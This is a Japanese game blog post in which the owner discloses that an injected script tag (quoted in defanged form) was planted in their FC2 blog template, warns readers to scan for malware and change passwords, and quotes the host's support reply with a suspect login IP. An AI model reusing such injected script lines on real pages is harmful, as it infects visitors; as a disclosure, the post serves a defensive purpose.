異物混入

異物混入 に関する記事です。
上記の広告は1ヶ月以上更新のないブログに表示されています。
新しい記事を書く事で広告が消せます。

[RSS]

今回の混入物
<script src=hxxp://1039045744:88/jp■js> </script>
XREA騒動の物と同じ。
8/30 16:30頃に該当タグの挿入に気がつき非公開モードに移行しました。
8/30に当ブログをご覧になった方でJavaScriptが有効になていた場合
ウィルスに感染している可能性があります。
ウィルススキャンとPOLパスの変更をお願いします。


中華は本当にいい加減にしてほしい。。。
他ブログサービスに移行したら安全という物でも無い気がするのだけど
そこらへんも考えなければいけないのかも。

とりあえず、自己防衛はしっかり。
Noscriptがきちんと作動してる環境なら問題は無い模様です。


9/3:追記にFC2からの返信メール。
Fc2からの返信メール
----------------------ココカラ----------------------------
FC2ユーザサポート中道と申します。
いつもFC2ブログをご利用頂きありがとうございます。

お問い合わせいただきました件ですが、
> ブログ読者にたいして注意喚起を促すため、改竄を受けた時刻の調査をお願い
いたします。
> 管理者によるテンプレートの更新は8/30 16:50以前にはしばらく行っていない
はずなので、その直近のタイムスタンプの確認をお願いします。

こちらで確認させて頂きましたが、
------------------------
2008-08-31 08:04:47 OFSfb-27p3-130.ppp11.odn.ad.jp (210.197.214.130)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 1.7;
TencentTraveler 4.0)
------------------------
上記のようなログインログが残っており、ご利用のユーザーエージェント(ブラ
ウザ等)にTencentTraveler QQDownload といったソフトウェアでの
記録がございます。
お客様はこちらのソフトウェアをご利用ではございませんでしょうか?

こちらのソフトウェアの概要を調べましたところ、確定ではございませんが、
スパイウェアと同様の働きを含んでいる可能性がございます。
こちらのソフトウェアが働いていることにより、ウイルス等を誘引している可能
性高いと見られます。
---------------------ココマデ---------------------------

青文字のところは私からの要望。
なぜか8/31のログをチェックしておくってきているので改竄自体がいつあったか不明
明らかに我が家のIPとは違うISPからのアクセスであるため、不正ログインは確定
OFSfb-27p3-130.ppp11.odn.ad.jp (210.197.214.130)
こいつが不正にアクセスしていることは確実です。
TencentTravelerというのは中国で人気のタブブラウザ
うちでは当然そんな怪しいものをインストールしてるわけないですしね。
現状、再度改ざんされる可能性があります。
閲覧は自己責任でよろしくおねがいします。

CM
アインシュタインの脳・集中力をつけるCD
セキュリティーソフトのトレンドマイクロ・オンラインショップ
人気ブログバーナー
↑オンラインゲームブログランキング参加中

[RSS]

コメント
この記事へのコメント
コメントを投稿する
URL:
Comment:
Pass:
秘密: 管理者にだけ表示を許可する
 
トラックバック
この記事のトラックバックURL
http://ffxiwar.blog91.fc2.com/tb.php/274-9e8ac483
この記事にトラックバックする(FC2ブログユーザー)
この記事へのトラックバック
上記広告は1ヶ月以上更新のないブログに表示されています。新しい記事を書くことで広告を消せます。